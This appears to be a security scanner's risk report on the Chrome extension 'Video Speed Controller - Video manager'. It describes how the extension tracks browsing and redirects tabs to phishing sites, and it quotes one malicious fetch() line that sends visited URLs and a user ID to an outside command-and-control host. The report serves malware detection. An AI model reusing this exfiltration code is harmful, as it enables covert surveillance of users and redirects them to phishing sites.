Spyware Activity
Flags items that secretly collect user or device information without authorization.
Video Speed Controller - Video manager is a Google Chrome extension that allows users to adjust video playback speed on various streaming platforms. It is rated Critical risk due to confirmed malicious behavior and involvement in a known campaign.
Key insights:
Flags items that secretly collect user or device information without authorization.
Flags items that have been linked to known malicious campaigns based on threat intelligence or prior incidents. Indicates coordinated activity with intent to compromise, deceive, or exploit users.
Flags items that exhibit confirmed malicious activity.
Evidence
While appearing functional, this extension hijacks the browser by intercepting tab updates, exfiltrating visited URLs to a threat actor’s command-and-control server, and redirecting users to phishing or malware sites. This behavior enables persistent surveillance, credential theft, and full account compromise.
AI-powered analysis of the extension's source code for security insights and risk assessment.
This Chrome extension is designed to control the playback speed of HTML5 videos via context menu options. It creates a context menu on video elements with options to increase, decrease, or reset the playback speed, and communicates these actions to content scripts via message passing.
Key behaviors:
https://click.videocontrolls.com/api?... with a unique user ID and the outgoing URL as parameters. If the response is a valid HTTP URL, it may redirect the current tab or open a new tab to that URL, depending on the keepTab setting.Network Activity:
click.videocontrolls.com) on every tab update. The server response can cause the extension to redirect the user's tab to a new URL.fetch("https://click.videocontrolls.com/api?key=...&uuid="+a+"&allowempty=1&out="+encodeURIComponent(r.url)+"&format=txt&r="+Math.random(), c)
Potential Concerns:
No filesystem or process execution activity was observed.
API calls detected through static analysis of the source code. For more accurate insights, explore our sandbox dynamic analysis.
Any encoded/decoded secrets we managed to find in the source code, git repository, or related files
Known vulnerabilities and security issues detected in the extension's dependencies and code.
Any identifiers we detected that may indicate external communication from the item's code
Dependencies and third-party libraries used by the extension, including version information and license details.